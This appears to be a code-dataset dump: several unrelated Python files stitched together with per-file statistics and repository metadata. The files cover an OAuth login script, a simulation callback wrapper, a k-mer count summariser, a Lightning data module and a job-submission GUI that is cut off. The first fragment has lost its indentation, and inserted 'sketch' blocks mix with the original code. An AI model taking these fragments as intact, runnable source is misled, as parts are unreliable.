if 'code' in web_server.query_params:
break
elif 'error' in web_server.query_params:
print('Authentication Error: "%s". Description: "%s" ' % (
web_server.query_params['error'],
web_server.query_params.get('error_description')), file=sys.stderr)
break
try:
auth_resp = CommaApi().post('v2/auth/', data={'code': web_server.query_params['code'], 'provider': web_server.query_params['provider']})
set_token(auth_resp['access_token'])
except APIError as e:
print(f'Authentication Error: {e}', file=sys.stderr)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Login to your comma account')
parser.add_argument('method', default='google', const='google', nargs='?', choices=['google', 'apple', 'github', 'jwt'])
parser.add_argument('jwt', nargs='?')
args = parser.parse_args()
if args.method == 'jwt':
if args.jwt is None:
print("method JWT selected, but no JWT was provided")
exit(1)
set_token(args.jwt)
else:
login(args.method)
try:
me = CommaApi(token=get_token()).get('/v1/me')
print("Authenticated!")
pprint.pprint(me)
except UnauthorizedError:
print("Got invalid JWT")
exit(1)
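# --- Sketch (not part of the original file) ------------------------------------
# The localhost-redirect capture above, reduced to its bare stdlib pattern;
# the response body here is illustrative.
def _redirect_capture_sketch(port=PORT):
    class _Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.server.query_params = parse_qs(
                self.path.split('?', 1)[-1], keep_blank_values=True)
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b'You may close this tab')
    server = HTTPServer(('localhost', port), _Handler)
    server.handle_request()  # blocks until the provider redirects the browser back
    return server.query_params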
| 28.650685
| 140
| 0.672962
| 536
| 4,183
| 5.126866
| 0.384328
| 0.029476
| 0.043304
| 0.043668
| 0.049491
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014052
| 0.183361
| 4,183
| 145
| 141
| 28.848276
| 0.790398
| 0.130528
| 0
| 0.161616
| 0
| 0
| 0.283154
| 0.026192
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040404
| false
| 0.010101
| 0.090909
| 0
| 0.20202
| 0.080808
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5d51d8a99234145a06442d575334e8b8cd54c32
| 4,762
|
py
|
Python
|
elastica/wrappers/callbacks.py
|
zhidou2/PyElastica
|
0f5502bc5349ab5e5dc794d8dfc82b7c2bd69eb6
|
[
"MIT"
] | 71
|
2020-04-15T17:02:42.000Z
|
2022-03-26T04:53:51.000Z
|
elastica/wrappers/callbacks.py
|
zhidou2/PyElastica
|
0f5502bc5349ab5e5dc794d8dfc82b7c2bd69eb6
|
[
"MIT"
] | 59
|
2020-05-15T03:51:46.000Z
|
2022-03-28T13:53:01.000Z
|
elastica/wrappers/callbacks.py
|
zhidou2/PyElastica
|
0f5502bc5349ab5e5dc794d8dfc82b7c2bd69eb6
|
[
"MIT"
] | 57
|
2020-06-17T20:34:02.000Z
|
2022-03-16T08:09:54.000Z
|
__doc__ = """
CallBacks
-----------
Provides the callBack interface to collect data over time (see `callback_functions.py`).
"""
from elastica.callback_functions import CallBackBaseClass
class CallBacks:
"""
CallBacks class is a wrapper for calling callback functions, set by the user. If the user
wants to collect data from the simulation, the simulator class has to be derived
from the CallBacks class.
Attributes
----------
_callbacks: list
List of call back classes defined for rod-like objects.
"""
def __init__(self):
self._callbacks = []
super(CallBacks, self).__init__()
def collect_diagnostics(self, system):
"""
This method calls user-defined call-back classes for a
user-defined system or rod-like object. You need to input the
system or rod-like object that you want to collect data from.
Parameters
----------
system: object
System is a rod-like object.
Returns
-------
"""
sys_idx = self._get_sys_idx_if_valid(system)
# Create _Constraint object, cache it and return to user
_callbacks = _CallBack(sys_idx)
self._callbacks.append(_callbacks)
return _callbacks
def _finalize(self):
# From stored _CallBack objects, instantiate the boundary conditions
# inplace : https://stackoverflow.com/a/1208792
# dev : the first index stores the rod index to collect data.
# Technically we could use another array, but it is one more book-keeping
# step. Being lazy, I put them both in the same array
self._callbacks[:] = [
(callback.id(), callback(self._systems[callback.id()]))
for callback in self._callbacks
]
# Sort from lowest id to highest id for potentially better memory access
# _callbacks contains list of tuples. First element of tuple is rod number and
# following elements are the type of boundary condition such as
# [(0, MyCallBack), (1, MyVelocityCallBack), ... ]
# Thus using lambda we iterate over the list of tuples and use rod number (x[0])
# to sort callbacks.
self._callbacks.sort(key=lambda x: x[0])
self._callBack(time=0.0, current_step=0)
# TODO: same as above naming of _callBack function
def _callBack(self, time, current_step: int, *args, **kwargs):
for sys_id, callback in self._callbacks:
callback.make_callback(
self._systems[sys_id], time, current_step, *args, **kwargs
)
class _CallBack:
"""
CallBack wrapper private class
Attributes
----------
_sys_idx: rod object index
_callback_cls: list
*args
Variable length argument list.
**kwargs
Arbitrary keyword arguments.
"""
def __init__(self, sys_idx: int):
"""
Parameters
----------
sys_idx: int
"""
self._sys_idx = sys_idx
self._callback_cls = None
self._args = ()
self._kwargs = {}
def using(self, callback_cls, *args, **kwargs):
"""
This method is a wrapper to set which callback class is used to collect data
from user defined rod-like object.
Parameters
----------
callback_cls: object
User defined callback class.
*args
Variable length argument list
**kwargs
Arbitrary keyword arguments.
Returns
-------
"""
assert issubclass(
callback_cls, CallBackBaseClass
), "{} is not a valid call back. Did you forget to derive from CallBackClass?".format(
callback_cls
)
self._callback_cls = callback_cls
self._args = args
self._kwargs = kwargs
return self
def id(self):
return self._sys_idx
def __call__(self, *args, **kwargs):
"""Constructs a callback functions after checks
Parameters
----------
args
kwargs
Returns
-------
"""
if not self._callback_cls:
raise RuntimeError(
"No callback provided to act on rod id {0}"
"but a callback was registered. Did you forget to call"
"the `using` method".format(self.id())
)
try:
return self._callback_cls(*self._args, **self._kwargs)
except (TypeError, IndexError):
raise TypeError(
r"Unable to construct callback class.\n"
r"Did you provide all necessary callback properties?"
)
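# --- Usage sketch (not part of the original file) -------------------------------
# How a user-defined callback is wired through this interface; the class below
# and its parameters are illustrative placeholders, not PyElastica API.
class _RecordTimes(CallBackBaseClass):
    def __init__(self, step_skip, store):
        super().__init__()
        self.step_skip = step_skip
        self.store = store

    def make_callback(self, system, time, current_step):
        if current_step % self.step_skip == 0:
            self.store.append(time)  # collect whatever diagnostic is needed

# Inside a simulator class derived from CallBacks:
#     simulator.collect_diagnostics(rod).using(_RecordTimes, step_skip=100, store=[])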
| 29.214724
| 94
| 0.584208
| 542
| 4,762
| 4.972325
| 0.350554
| 0.040816
| 0.024119
| 0.018924
| 0.060853
| 0.045269
| 0.045269
| 0.045269
| 0.045269
| 0
| 0
| 0.004685
| 0.327593
| 4,762
| 162
| 95
| 29.395062
| 0.836977
| 0.414112
| 0
| 0
| 0
| 0
| 0.161223
| 0.010469
| 0
| 0
| 0
| 0.006173
| 0.016949
| 1
| 0.135593
| false
| 0
| 0.016949
| 0.016949
| 0.254237
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5d5b53df6261a4974bd6d3bb678fc4435a6413e
| 15,032
|
py
|
Python
|
scripts/summarize-kmer-counts.py
|
rpetit3/anthrax-metagenome-study
|
b4a6f2c4d49b57aeae898afd6a95c8f6cb437945
|
[
"MIT"
] | null | null | null |
scripts/summarize-kmer-counts.py
|
rpetit3/anthrax-metagenome-study
|
b4a6f2c4d49b57aeae898afd6a95c8f6cb437945
|
[
"MIT"
] | null | null | null |
scripts/summarize-kmer-counts.py
|
rpetit3/anthrax-metagenome-study
|
b4a6f2c4d49b57aeae898afd6a95c8f6cb437945
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python3
"""Parse through the simulated sequencing group specific kmer counts."""
import argparse as ap
from collections import OrderedDict
import glob
import gzip
import os
import sys
import time
import numpy as np
import multiprocessing as mp
SAMPLES = OrderedDict()
KMERS = {}
HAMMING = OrderedDict()
SAMPLE_COLS = [
'sample', 'is_bcg', 'is_ba', 'has_lethal', 'simulated_coverage', 'group',
'total_kmers', 'tp', 'tn', 'fp', 'fn',
'kmer_cov_min', 'kmer_cov_mean', 'kmer_cov_median', 'kmer_cov_max',
'non_zero_kmer_cov_min', 'non_zero_kmer_cov_mean',
'non_zero_kmer_cov_median', 'non_zero_kmer_cov_max'
]
KMER_COLS = [
'kmer', 'simulated_coverage', 'group', 'hamming_distance',
'tp', 'tn', 'fp', 'fn',
'group_kmer_cov_min',
'group_kmer_cov_mean',
'group_kmer_cov_median',
'group_kmer_cov_max',
'non_zero_group_kmer_cov_min',
'non_zero_group_kmer_cov_mean',
'non_zero_group_kmer_cov_median',
'non_zero_group_kmer_cov_max',
'outgroup_kmer_cov_min',
'outgroup_kmer_cov_mean',
'outgroup_kmer_cov_median',
'outgroup_kmer_cov_max',
'non_zero_outgroup_kmer_cov_min',
'non_zero_outgroup_kmer_cov_mean',
'non_zero_outgroup_kmer_cov_median',
'non_zero_outgroup_kmer_cov_max'
]
def get_group_status(sample, group):
"""Return if a sample is within a group or not."""
within_group = None
if group == 'ba':
within_group = True if SAMPLES[sample]['is_ba'] == 'True' else False
elif group == 'bcg':
within_group = True if SAMPLES[sample]['is_bcg'] == 'True' else False
else:
# lef
within_group = True if SAMPLES[sample]['has_lethal'] else False
return within_group
def get_coverage_stats(coverage):
"""Return summary stats of a set of coverages."""
non_zero = [c for c in coverage if c]
np_array = np.array(coverage)
non_zero_array = np.array(non_zero)
return {
'min': min(coverage) if coverage else 0,
'median': int(np.median(np_array)) if coverage else 0,
'mean': "{0:.4f}".format(np.mean(np_array)) if coverage else 0,
'max': max(coverage) if coverage else 0,
'non_zero_min': min(non_zero_array) if non_zero else 0,
'non_zero_median': int(np.median(non_zero_array)) if non_zero else 0,
'non_zero_mean': int(round(np.mean(non_zero_array))) if non_zero else 0,
'non_zero_max': max(non_zero_array) if non_zero else 0,
}
def reverse_complement(seq):
"""Reverse complement a DNA sequence."""
complement = {
'A': 'T', 'T': 'A', 'G': 'C', 'C': 'G',
'a': 't', 't': 'a', 'g': 'c', 'c': 'g'
}
return ''.join([complement[b] for b in seq[::-1]])
def parse_counts(counts, sample, coverage, group, skip_kmers=False,
filter_kmers=False):
"""Parse kmer counts."""
within_group = get_group_status(sample, group)
sample_row = {'coverages': [], 'tp': 0, 'tn': 0, 'fp': 0, 'fn': 0}
with gzip.open(counts, 'r') as count_handle:
for line in count_handle:
kmer, count = line.decode().rstrip().split()
count = int(count)
parse = True
if filter_kmers:
parse = kmer in KMERS or reverse_complement(kmer) in KMERS
elif not skip_kmers:
if kmer not in KMERS:
kmer = reverse_complement(kmer)
if within_group:
KMERS[kmer][coverage]['group_coverages'].append(count)
if count:
KMERS[kmer][coverage]['tp'] += 1
else:
KMERS[kmer][coverage]['fn'] += 1
else:
KMERS[kmer][coverage]['outgroup_coverages'].append(count)
if count:
KMERS[kmer][coverage]['fp'] += 1
else:
KMERS[kmer][coverage]['tn'] += 1
if parse:
sample_row['coverages'].append(count)
if within_group:
if count:
sample_row['tp'] += 1
else:
sample_row['fn'] += 1
else:
if count:
sample_row['fp'] += 1
else:
sample_row['tn'] += 1
coverage_stats = get_coverage_stats(sample_row['coverages'])
SAMPLES[sample]['results'].append({
'simulated_coverage': coverage,
'within_group': within_group,
'tp': sample_row['tp'],
'tn': sample_row['tn'],
'fp': sample_row['fp'],
'fn': sample_row['fn'],
'kmer_cov_min': coverage_stats['min'],
'kmer_cov_mean': coverage_stats['mean'],
'kmer_cov_median': coverage_stats['median'],
'kmer_cov_max': coverage_stats['max'],
'non_zero_kmer_cov_min': coverage_stats['non_zero_min'],
'non_zero_kmer_cov_mean': coverage_stats['non_zero_mean'],
'non_zero_kmer_cov_median': coverage_stats['non_zero_median'],
'non_zero_kmer_cov_max': coverage_stats['non_zero_max'],
})
def parse_kmers(kmers, coverages, skip_kmers=False, has_hamming=True):
with open(kmers, 'r') as kmer_handle:
for line in kmer_handle:
if line.startswith(">"):
line = line.rstrip().replace(">", "")
kmer, distance = line.split("-")
if not has_hamming:
distance = False
KMERS[kmer] = OrderedDict()
HAMMING[kmer] = distance
if not skip_kmers:
for coverage in coverages:
KMERS[kmer][coverage] = {
'group_coverages': [], 'outgroup_coverages': [],
'tp': 0, 'tn': 0, 'fp': 0, 'fn': 0
}
def parse_summary(summary):
"""Parse Summary file."""
cols = None
with open(summary, 'r') as summary_handle:
# Column Names:
# accession, gi, is_bcg, is_ba, species, genome_size, description
for line in summary_handle:
line = line.rstrip()
if line.startswith('#'):
cols = line.replace('#', '').split('\t')
else:
row = dict(zip(cols, line.split('\t')))
SAMPLES[row['accession']] = row
if row['accession'] == 'NZ_CP009941':
# NZ_CP009941 - Bacillus cereus w/ lef on chromosome
SAMPLES[row['accession']]['has_lethal'] = True
else:
SAMPLES[row['accession']]['has_lethal'] = False
SAMPLES[row['accession']]['results'] = []
def print_sample_summary(file_output):
"""Print the final per sample summaries."""
with open(file_output, 'w') as output_handle:
output_handle.write(("\t".join(SAMPLE_COLS)))
output_handle.write("\n")
for sample in SAMPLES:
if SAMPLES[sample]['results']:
for result in SAMPLES[sample]['results']:
row = {
'sample': sample,
'is_bcg': SAMPLES[sample]['is_bcg'],
'is_ba': SAMPLES[sample]['is_ba'],
'has_lethal': SAMPLES[sample]['has_lethal'],
'simulated_coverage': result['simulated_coverage'],
'group': args.group,
'within_group': result['within_group'],
'total_kmers': total_kmers,
'tp': result['tp'],
'tn': result['tn'],
'fp': result['fp'],
'fn': result['fn'],
'kmer_cov_min': result['kmer_cov_min'],
'kmer_cov_mean': result['kmer_cov_mean'],
'kmer_cov_median': result['kmer_cov_median'],
'kmer_cov_max': result['kmer_cov_max'],
'non_zero_kmer_cov_min': result['non_zero_kmer_cov_min'],
'non_zero_kmer_cov_mean': result['non_zero_kmer_cov_mean'],
'non_zero_kmer_cov_median': result['non_zero_kmer_cov_median'],
'non_zero_kmer_cov_max': result['non_zero_kmer_cov_max']
}
output_handle.write(("\t".join([
str(row[col]) for col in SAMPLE_COLS
])))
output_handle.write("\n")
def print_kmer_summary(file_output):
"""Print the final per kmer summaries."""
with open(file_output, 'w') as output_handle:
output_handle.write(("\t".join(KMER_COLS)))
output_handle.write("\n")
for kmer, coverages in KMERS.items():
for coverage in coverages:
within_group = get_coverage_stats(
KMERS[kmer][coverage]['group_coverages']
)
outgroup = get_coverage_stats(
KMERS[kmer][coverage]['outgroup_coverages']
)
row = {
'kmer': kmer,
'simulated_coverage': coverage,
'group': args.group,
'hamming_distance': HAMMING[kmer],
'tp': KMERS[kmer][coverage]['tp'],
'tn': KMERS[kmer][coverage]['tn'],
'fp': KMERS[kmer][coverage]['fp'],
'fn': KMERS[kmer][coverage]['fn'],
'group_kmer_cov_min': within_group['min'],
'group_kmer_cov_mean': within_group['mean'],
'group_kmer_cov_median': within_group['median'],
'group_kmer_cov_max': within_group['max'],
'non_zero_group_kmer_cov_min': within_group['non_zero_min'],
'non_zero_group_kmer_cov_mean': within_group['non_zero_mean'],
'non_zero_group_kmer_cov_median': within_group['non_zero_median'],
'non_zero_group_kmer_cov_max': within_group['non_zero_max'],
'outgroup_kmer_cov_min': outgroup['min'],
'outgroup_kmer_cov_mean': outgroup['mean'],
'outgroup_kmer_cov_median': outgroup['median'],
'outgroup_kmer_cov_max': outgroup['max'],
'non_zero_outgroup_kmer_cov_min': outgroup['non_zero_min'],
'non_zero_outgroup_kmer_cov_mean': outgroup['non_zero_mean'],
'non_zero_outgroup_kmer_cov_median': outgroup['non_zero_median'],
'non_zero_outgroup_kmer_cov_max': outgroup['non_zero_max'],
}
output_handle.write(("\t".join([
str(row[col]) for col in KMER_COLS
])))
output_handle.write("\n")
def read_lines(input_file):
"""Return lines in a text file as a list."""
lines = []
with open(input_file, 'r') as input_handle:
for line in input_handle:
lines.append(line.rstrip())
return lines
def parse_filter_kmers(kmers):
with open(kmers, 'r') as kmer_handle:
for line in kmer_handle:
if line.startswith(">"):
line = line.rstrip().replace(">", "")
KMERS[line.split("-")[0]] = True
if __name__ == '__main__':
parser = ap.ArgumentParser(
prog='summarize-kmer-counts.py', conflict_handler='resolve',
description=("Summarize kmer counts of each simulation.")
)
parser.add_argument('summary', type=str, metavar="SUMMARY",
help='Summary of Bacillus genomes.')
parser.add_argument('directory', type=str, metavar="SIMUALTION_DIR",
help='Directory with group specific 31-mer counts.')
parser.add_argument('group', type=str, metavar="GROUP",
help='Which group to parse (ba, bcg or lef).')
parser.add_argument('kmers', type=str, metavar="KMERS",
help='Group specific k-mers.')
parser.add_argument('coverages', type=str, metavar="COVERAGES",
help=('Coverages to subsample to.'))
parser.add_argument('outdir', type=str, metavar="OUTDIR",
help='Directory to output to.')
parser.add_argument('--cpu', default=1, type=int, metavar="INT",
help='Number of cores to use (Default: 1)')
parser.add_argument('--single_sample', type=str, metavar="STR",
help='Process a single sample.')
parser.add_argument('--skip_kmers', action='store_true', default=False,
help='Skip kmer processing.')
parser.add_argument('--filter', action='store_true', default=False,
help='Filter counts based on input kmers.')
args = parser.parse_args()
if args.group not in ['ba', 'bcg', 'lef']:
raise Exception("GROUPS must be 'ba', 'bcg' or 'lef'")
coverages = read_lines(args.coverages)
print("Parsing Summary")
parse_summary(args.summary)
print("Parsing Kmers")
if args.filter:
print("Filtering Kmers")
args.skip_kmers = True
parse_filter_kmers(args.kmers)
else:
print("Parsing Kmers")
parse_kmers(args.kmers, coverages, skip_kmers=args.skip_kmers,
has_hamming=False if args.group == 'lef' else True)
total_kmers = len(KMERS)
current = 1
samples = list(SAMPLES.keys())
if args.single_sample:
samples = [args.single_sample]
total = len(samples)
for sample in samples:
path = "{0}/{1}".format(args.directory, sample)
if os.path.exists(path):
print("Working on {0} ({1} of {2})".format(sample, current, total))
current += 1
count_files = sorted(glob.glob(
"{0}/*-{1}.txt.gz".format(path, args.group)
))
for count_file in count_files:
coverage = os.path.basename(count_file).split('-')[1]
parse_counts(count_file, sample, coverage, args.group,
skip_kmers=args.skip_kmers,
filter_kmers=args.filter)
print("Output sample summary")
if args.single_sample:
print_sample_summary("{0}/count-summary-{1}-{2}.txt".format(
args.outdir, args.single_sample, args.group
))
else:
print_sample_summary("{0}/count-summary-sample-{1}.txt".format(
args.outdir, args.group
))
if not args.skip_kmers:
print("Output kmer summary")
if args.single_sample:
print_kmer_summary("{0}/count-summary-kmer-{1}-{2}.txt".format(
args.outdir, args.single_sample, args.group
))
else:
print_kmer_summary("{0}/count-summary-kmer-{1}.txt".format(
args.outdir, args.group
))
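# --- Sanity-check sketch (not part of the original script) ----------------------
def _helper_checks():
    """Hand-worked examples for the pure helpers above (illustrative only)."""
    assert reverse_complement("AACG") == "CGTT"      # complement, then reverse
    stats = get_coverage_stats([0, 0, 3, 5])
    assert stats['min'] == 0 and stats['max'] == 5   # zeros included here
    assert stats['non_zero_min'] == 3                # zeros excluded here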
| 40.408602
| 87
| 0.549494
| 1,738
| 15,032
| 4.478711
| 0.116801
| 0.057554
| 0.020555
| 0.028777
| 0.434481
| 0.3398
| 0.212616
| 0.13335
| 0.103931
| 0.098535
| 0
| 0.006367
| 0.320849
| 15,032
| 371
| 88
| 40.51752
| 0.756098
| 0.033196
| 0
| 0.181818
| 0
| 0
| 0.220811
| 0.082234
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031348
| false
| 0
| 0.028213
| 0
| 0.0721
| 0.040752
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5d9b42548010e4777afbfec7a0536b09a13b146
| 1,883
|
py
|
Python
|
src/data/dataModule.py
|
mikkelfo/Title-prediction-from-abstract
|
45c9b64c963ae9b00c6b34a3f2b9f7c25496350e
|
[
"MIT"
] | null | null | null |
src/data/dataModule.py
|
mikkelfo/Title-prediction-from-abstract
|
45c9b64c963ae9b00c6b34a3f2b9f7c25496350e
|
[
"MIT"
] | null | null | null |
src/data/dataModule.py
|
mikkelfo/Title-prediction-from-abstract
|
45c9b64c963ae9b00c6b34a3f2b9f7c25496350e
|
[
"MIT"
] | null | null | null |
from typing import Optional
import pytorch_lightning as pl
import torch
from omegaconf import OmegaConf
from torch.utils.data import DataLoader, random_split
from transformers import T5Tokenizer
from src.data.PaperDataset import PaperDataset
class ArvixDataModule(pl.LightningDataModule):
def __init__(self, config: str = "src/data/config.yaml") -> None:
super().__init__()
self.config = OmegaConf.load(config)
def prepare_data(self) -> None:
# Add tokenizing
tokenizer = T5Tokenizer.from_pretrained("t5-base")
titles, abstracts = torch.load("data/processed/data.pt").T
tokenized_abstracts = tokenizer.batch_encode_plus(
abstracts, padding=True, truncation=True, return_tensors="pt"
)
tokenized_titles = tokenizer.batch_encode_plus(
titles, padding=True, truncation=True, return_tensors="pt"
)
self.data = PaperDataset(tokenized_abstracts, tokenized_titles)
def setup(self, stage: Optional[str] = None):
train, val, test = random_split(
self.data,
[self.config.n_train, self.config.n_val, self.config.n_test],
generator=torch.Generator().manual_seed(1337),
)
if stage == "fit" or stage is None:
self.train_set = train
self.val_set = val
if stage == "test":
self.test_set = test
def train_dataloader(self) -> DataLoader:
return DataLoader(self.train_set, batch_size=32, num_workers=4)
def val_dataloader(self) -> DataLoader:
return DataLoader(self.val_set, batch_size=32, num_workers=4)
def test_dataloader(self) -> DataLoader:
return DataLoader(self.test_set, batch_size=32, num_workers=4)
if __name__ == "__main__":
dm = ArvixDataModule()
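# --- Usage sketch (not part of the original file) --------------------------------
# Typical wiring with a Trainer; the model argument is a placeholder
# LightningModule, not something defined in the file above.
def _train_sketch(model: pl.LightningModule):
    trainer = pl.Trainer(max_epochs=1)
    trainer.fit(model, datamodule=ArvixDataModule())  # runs prepare_data/setup for us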
| 32.465517
| 73
| 0.669676
| 227
| 1,883
| 5.334802
| 0.330396
| 0.069364
| 0.02725
| 0.074319
| 0.314616
| 0.314616
| 0.205615
| 0.11891
| 0.072667
| 0
| 0
| 0.011019
| 0.22889
| 1,883
| 57
| 74
| 33.035088
| 0.823003
| 0.038237
| 0
| 0
| 0
| 0
| 0.037611
| 0.012168
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15
| false
| 0
| 0.175
| 0.075
| 0.425
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5d9d4fd434e21de06a534a9b7ddf3881191564e
| 10,573
|
py
|
Python
|
shs/gui/RootFrame.py
|
ansobolev/shs
|
7a5f61bd66fe1e8ae047a4d3400b055175a53f4e
|
[
"MIT"
] | 1
|
2016-06-22T13:30:25.000Z
|
2016-06-22T13:30:25.000Z
|
shs/gui/RootFrame.py
|
ansobolev/shs
|
7a5f61bd66fe1e8ae047a4d3400b055175a53f4e
|
[
"MIT"
] | 1
|
2017-12-01T04:49:45.000Z
|
2017-12-01T04:49:45.000Z
|
shs/gui/RootFrame.py
|
ansobolev/shs
|
7a5f61bd66fe1e8ae047a4d3400b055175a53f4e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import sys
import time
import subprocess
import wx
import ConfigParser
from wx.lib.mixins.listctrl import getListCtrlSelection
from wx.lib.pubsub import pub
from gui.RootGUI import RootGUI
from StepsDialog import StepsDialog
from PlotFrame import PlotFuncFrame, PlotCorrFrame
import interface
import mbox
class RootFrame(RootGUI):
calcs = []
plot_frame = None
def __init__(self, *args, **kwds):
super(RootFrame, self).__init__(*args, **kwds)
# set root
self.root = self.set_root()
# initialize choices
self.propChoices = interface.dataClasses()
calc_data_types = self.propChoices.types()
calc_data_classes = self.propChoices.classes(calc_data_types[0])
corr_classes = self.propChoices.classes("Histogram")
self.propType.SetItems(calc_data_types)
self.propChoice.SetItems(calc_data_classes)
self.xCorr.SetItems(corr_classes)
self.yCorr.SetItems(corr_classes)
self.propType.SetSelection(0)
self.propChoice.SetSelection(0)
self.xCorr.SetSelection(0)
self.yCorr.SetSelection(0)
# initialize calc tree
self.build_tree(self.root, self.typeRBox.GetItemLabel(self.typeRBox.GetSelection()))
# initialize calc list
self.calcList.InsertColumn(0, 'Directory', width=180)
self.calcList.InsertColumn(1, 'Type', width=70)
self.calcList.InsertColumn(2, 'NSteps', width=100)
def set_root(self):
"""
Sets the root directory for the GUI based on the config file
:return: Root directory
"""
config_dir = os.path.expanduser("~/.local/shs")
config_file = os.path.join(config_dir, "shs_gui.cfg")
# check the file and create one if it's not there
if not os.path.isfile(config_file):
os.makedirs(config_dir)
open(config_file, 'w').close()
config = ConfigParser.ConfigParser()
config.read(config_file)
# if config exists and has needed option
if config.has_option("general", "root_dir"):
return config.get("general", "root_dir")
# make config
if not config.has_section("general"):
config.add_section("general")
dlg = wx.DirDialog(self, "Select root directory")
if dlg.ShowModal() == wx.ID_OK:
root_dir = dlg.GetPath()
config.set("general", "root_dir", root_dir)
else:
sys.exit(1)
with open(config_file, 'w') as f:
config.write(f)
return root_dir
def build_tree(self, root, calc_type):
"""
Adds a new root element and then its children
:param root: root directory for the tree
:param calc_type: calculation type
"""
self.calcTree.DeleteAllItems()
r = len(root.split(os.sep))
ids = {root: self.calcTree.AddRoot(root)}
for (dir_path, dir_names, file_names) in os.walk(root):
if interface.isCalcOfType(calc_type, dn=dir_names, fn=file_names):
# find the number of steps in MDE file, quickly
nsteps = interface.GetNumMDESteps(dir_path)
ancdirs = dir_path.split(os.sep)[r:]
if nsteps is not None:
ancdirs[-1] += ' [%i]' % nsteps
ad = root
for ancdir in ancdirs:
d = os.path.join(ad, ancdir)
                    if d not in ids:
ids[d] = self.calcTree.AppendItem(ids[ad], ancdir)
self.calcTree.SortChildren(ids[ad])
ad = d
def get_selection_dir(self):
item = self.calcTree.GetSelection()
parent = self.calcTree.GetItemParent(item)
path = [self.calcTree.GetItemText(item)]
while parent.IsOk():
path.append(self.calcTree.GetItemText(parent))
parent = self.calcTree.GetItemParent(parent)
# calculation directory
calc_dir = os.sep.join(path[::-1]).split()[0]
return calc_dir
# return os.sep.join((self.root, calc_dir))
def onSelChange(self, event):
# calculation type
ctype = self.typeRBox.GetItemLabel(self.typeRBox.GetSelection())
# calculation directory
cdir = self.get_selection_dir()
if interface.isCalcOfType(ctype, dir=cdir):
self.enqueueBtn.Enable()
else:
self.enqueueBtn.Enable(False)
def propTypeChange(self, event):
# property type
pt_num = self.propType.GetSelection()
pt = self.propType.GetItems()[pt_num]
self.propChoice.SetItems(self.propChoices.classes(pt))
self.propChoice.SetSelection(0)
def typeChange(self, event):
ctype = self.typeRBox.GetItemLabel(self.typeRBox.GetSelection())
self.build_tree(self.root, ctype)
def upBtnPress(self, event):
# selection indices
sind = getListCtrlSelection(self.calcList)
if sind:
# number of deleted strings
ds = 0
for si in sind:
self.calcs.pop(si - ds)
self.calcList.DeleteItem(si - ds)
ds += 1
return 0
return 1
def downBtnPress(self, event):
# current list count
clc = self.calcList.GetItemCount()
# calculation type
ctype = self.typeRBox.GetItemLabel(self.typeRBox.GetSelection())
# calculation directory
cdir = self.get_selection_dir()
if not interface.isCalcOfType(ctype, dir=cdir):
mbox.NoResults(cdir, ctype)
return 1
# init steps range
r = None
if ctype in ('.output', '.ANI'):
# enter dialog
dlg = StepsDialog(None)
if dlg.ShowModal() == wx.ID_OK:
r = dlg.GetRange()
dlg.Destroy()
self.calcs.append(interface.getCalc(cdir, ctype, r))
self.calcList.InsertStringItem(clc, cdir[len(self.root)+1:])
self.calcList.SetStringItem(clc, 1, ctype)
self.calcList.SetStringItem(clc, 2, str(len(r)) if r is not None else '')
return 0
def on_enqueue_press(self, _):
from sshutils import getMount, getDevice, getRemoteDir
# on which device are we?
calc_dir = self.get_selection_dir()
mount_path = getMount(calc_dir)
device_name, device_type = getDevice(mount_path)
if 'ssh' in device_type:
user, host_dir = device_name.split('@')
hostname, remote_mount_path = host_dir.split(':')
remote_dir = getRemoteDir(calc_dir, mount_path, remote_mount_path)
self.enqueue_remote(remote_dir, hostname, user)
else:
self.enqueue_local(calc_dir)
@staticmethod
def enqueue_local(calc_dir):
"""
Enqueue a task on a local filesystem
:param calc_dir: calculation directory on a local filesystem
:return: error_code (0 is OK)
"""
import distutils.spawn
# find which queue system is implemented on cluster (qstat - PBS, sinfo - SLURM)
if distutils.spawn.find_executable('qstat') is not None:
q = 'pbs'
elif distutils.spawn.find_executable('sinfo') is not None:
q = 'slurm'
else:
mbox.JobSubmit(None, ())
return -1
comm = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', q, q + '.sh'))
submit = subprocess.Popen(['/bin/bash', comm, '-d=' + calc_dir], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
mbox.JobSubmit(q, submit.communicate())
@staticmethod
def enqueue_remote(calc_dir, host, user):
"""
Enqueue a task on a remote filesystem
:param calc_dir: calculation directory on a remote filesystem
:param host: host where to enqueue a task
:param user: user of a remote system who enqueues a task
:return: error code (0 is OK)
"""
from sshutils import getSSHClient, getQueue, copyFile, removeFile, runCommand
ssh = getSSHClient(host, user)
# find which queue system is implemented on cluster (qstat - PBS, sinfo - SLURM)
q = getQueue(ssh)
if q is None:
mbox.JobSubmit(None, ())
return None
# queue putter on a local machine
